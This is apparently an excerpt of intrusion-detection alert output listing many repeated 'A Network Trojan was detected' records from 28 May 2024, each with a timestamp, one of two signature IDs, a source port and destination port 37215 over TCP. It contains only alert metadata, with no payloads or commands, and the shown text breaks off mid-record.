          Timestamp:05/28/24-14:47:38.724344
          SID:2829579
          Source Port:52040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978248
          SID:2829579
          Source Port:43382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743676
          SID:2829579
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735497
          SID:2835222
          Source Port:58630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667429
          SID:2829579
          Source Port:54532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.245835
          SID:2835222
          Source Port:54104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513896
          SID:2829579
          Source Port:44070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543021
          SID:2829579
          Source Port:54264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914288
          SID:2829579
          Source Port:35550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974934
          SID:2829579
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501136
          SID:2835222
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961538
          SID:2829579
          Source Port:32864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237080
          SID:2835222
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476806
          SID:2835222
          Source Port:39056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551556
          SID:2829579
          Source Port:54642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962701
          SID:2829579
          Source Port:34968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046664
          SID:2829579
          Source Port:53316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267048
          SID:2835222
          Source Port:56114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295269
          SID:2835222
          Source Port:50566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922641
          SID:2835222
          Source Port:50312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154733
          SID:2835222
          Source Port:45892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176405
          SID:2829579
          Source Port:55824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822608
          SID:2835222
          Source Port:34604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476636
          SID:2829579
          Source Port:50166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977934
          SID:2835222
          Source Port:35108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146158
          SID:2835222
          Source Port:40702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943459
          SID:2829579
          Source Port:54690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631778
          SID:2835222
          Source Port:35716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.688995
          SID:2829579
          Source Port:35810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594515
          SID:2829579
          Source Port:44708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885733
          SID:2835222
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923772
          SID:2829579
          Source Port:50240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841235
          SID:2835222
          Source Port:38332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267751
          SID:2829579
          Source Port:44078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805531
          SID:2829579
          Source Port:41366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993012
          SID:2835222
          Source Port:34462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176018
          SID:2829579
          Source Port:52654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809369
          SID:2835222
          Source Port:41390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864451
          SID:2829579
          Source Port:59044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.234926
          SID:2829579
          Source Port:56596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330017
          SID:2835222
          Source Port:59820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.351087
          SID:2835222
          Source Port:50264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079551
          SID:2829579
          Source Port:58142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196158
          SID:2829579
          Source Port:60578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371424
          SID:2829579
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664641
          SID:2829579
          Source Port:45652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794124
          SID:2835222
          Source Port:49470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141773
          SID:2829579
          Source Port:42770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671973
          SID:2829579
          Source Port:35210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852655
          SID:2835222
          Source Port:60208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555156
          SID:2829579
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923987
          SID:2829579
          Source Port:56542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143090
          SID:2835222
          Source Port:34140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.768384
          SID:2829579
          Source Port:47156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.090947
          SID:2829579
          Source Port:42836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190385
          SID:2835222
          Source Port:48244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.060666
          SID:2835222
          Source Port:38426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115355
          SID:2829579
          Source Port:34392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181871
          SID:2829579
          Source Port:51088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652838
          SID:2829579
          Source Port:45350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157099
          SID:2835222
          Source Port:51438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877881
          SID:2835222
          Source Port:41698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065049
          SID:2829579
          Source Port:33766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527409
          SID:2829579
          Source Port:36072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146009
          SID:2829579
          Source Port:36684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810621
          SID:2835222
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103003
          SID:2835222
          Source Port:38602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860034
          SID:2835222
          Source Port:56888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175952
          SID:2829579
          Source Port:41750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102376
          SID:2829579
          Source Port:50886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291749
          SID:2835222
          Source Port:49042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151328
          SID:2835222
          Source Port:43454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538572
          SID:2829579
          Source Port:51194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941591
          SID:2829579
          Source Port:37196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865941
          SID:2835222
          Source Port:40660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838507
          SID:2829579
          Source Port:54712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402590
          SID:2835222
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542368
          SID:2835222
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266875
          SID:2829579
          Source Port:53724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803165
          SID:2829579
          Source Port:60376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949276
          SID:2835222
          Source Port:55648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270312
          SID:2835222
          Source Port:47092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075136
          SID:2829579
          Source Port:53216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202175
          SID:2829579
          Source Port:39816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332105
          SID:2829579
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770565
          SID:2835222
          Source Port:45432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472596
          SID:2829579
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103273
          SID:2835222
          Source Port:58182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213604
          SID:2829579
          Source Port:33690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271154
          SID:2835222
          Source Port:48246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156322
          SID:2829579
          Source Port:46006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269283
          SID:2829579
          Source Port:35404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549198
          SID:2835222
          Source Port:40258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959939
          SID:2835222
          Source Port:53890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763948
          SID:2835222
          Source Port:53706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809005
          SID:2829579
          Source Port:57358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849303
          SID:2829579
          Source Port:51308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729630
          SID:2829579
          Source Port:43646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361408
          SID:2829579
          Source Port:48286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.751576
          SID:2835222
          Source Port:58204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066088
          SID:2829579
          Source Port:53946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084466
          SID:2829579
          Source Port:34570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144092
          SID:2835222
          Source Port:33084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223105
          SID:2835222
          Source Port:55780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983569
          SID:2835222
          Source Port:60232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145341
          SID:2829579
          Source Port:59830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964192
          SID:2829579
          Source Port:52942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.862942
          SID:2835222
          Source Port:33014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590712
          SID:2835222
          Source Port:57484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102960
          SID:2829579
          Source Port:37232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935170
          SID:2829579
          Source Port:56596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268724
          SID:2829579
          Source Port:47060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156296
          SID:2829579
          Source Port:56500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976253
          SID:2829579
          Source Port:52764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399699
          SID:2835222
          Source Port:42512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300073
          SID:2835222
          Source Port:38454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547337
          SID:2829579
          Source Port:56000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151890
          SID:2835222
          Source Port:34962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272251
          SID:2835222
          Source Port:49186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044588
          SID:2835222
          Source Port:45864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146169
          SID:2829579
          Source Port:43192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859144
          SID:2829579
          Source Port:46708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946596
          SID:2829579
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211610
          SID:2829579
          Source Port:47188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679586
          SID:2835222
          Source Port:49028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223133
          SID:2835222
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.490261
          SID:2835222
          Source Port:39732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247106
          SID:2829579
          Source Port:46262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652843
          SID:2829579
          Source Port:45142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739583
          SID:2829579
          Source Port:58120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756402
          SID:2829579
          Source Port:49852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462601
          SID:2829579
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185590
          SID:2829579
          Source Port:40518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796352
          SID:2829579
          Source Port:40740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177879
          SID:2829579
          Source Port:40966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736727
          SID:2829579
          Source Port:34206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842393
          SID:2829579
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403351
          SID:2829579
          Source Port:43048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325384
          SID:2829579
          Source Port:35060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990574
          SID:2829579
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221013
          SID:2835222
          Source Port:43454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337480
          SID:2829579
          Source Port:45056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.919072
          SID:2829579
          Source Port:55552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.297038
          SID:2835222
          Source Port:33760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213516
          SID:2829579
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543550
          SID:2829579
          Source Port:37898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868119
          SID:2829579
          Source Port:34426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551265
          SID:2829579
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961768
          SID:2829579
          Source Port:41482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652331
          SID:2835222
          Source Port:36524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711421
          SID:2835222
          Source Port:38600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.797385
          SID:2835222
          Source Port:39738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666948
          SID:2835222
          Source Port:53298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764237
          SID:2829579
          Source Port:34706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.564063
          SID:2835222
          Source Port:51470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222861
          SID:2829579
          Source Port:34556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543098
          SID:2829579
          Source Port:56800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021446
          SID:2835222
          Source Port:60408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793558
          SID:2829579
          Source Port:34068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046780
          SID:2835222
          Source Port:45864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914212
          SID:2835222
          Source Port:42096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598482
          SID:2835222
          Source Port:56508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481331
          SID:2829579
          Source Port:39078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299387
          SID:2829579
          Source Port:57174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711396
          SID:2829579
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103025
          SID:2829579
          Source Port:41690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338115
          SID:2835222
          Source Port:32928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186034
          SID:2835222
          Source Port:47974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528224
          SID:2835222
          Source Port:56246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812354
          SID:2835222
          Source Port:37228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893992
          SID:2835222
          Source Port:58968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.919046
          SID:2835222
          Source Port:51228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590449
          SID:2835222
          Source Port:45790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782988
          SID:2829579
          Source Port:48864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143710
          SID:2829579
          Source Port:33930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860894
          SID:2835222
          Source Port:56232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271882
          SID:2829579
          Source Port:51390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.533111
          SID:2829579
          Source Port:58068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.232770
          SID:2829579
          Source Port:58928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565833
          SID:2835222
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280717
          SID:2829579
          Source Port:54836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543591
          SID:2835222
          Source Port:46524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608796
          SID:2835222
          Source Port:45498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328933
          SID:2829579
          Source Port:36118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591220
          SID:2829579
          Source Port:55054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339956
          SID:2829579
          Source Port:52004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485428
          SID:2835222
          Source Port:50688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815729
          SID:2829579
          Source Port:38188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215495
          SID:2829579
          Source Port:38502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140214
          SID:2835222
          Source Port:42524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814359
          SID:2829579
          Source Port:54164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085447
          SID:2835222
          Source Port:34460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301257
          SID:2829579
          Source Port:48712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426024
          SID:2829579
          Source Port:48714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953590
          SID:2829579
          Source Port:39306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221718
          SID:2829579
          Source Port:47770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890317
          SID:2835222
          Source Port:60608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704890
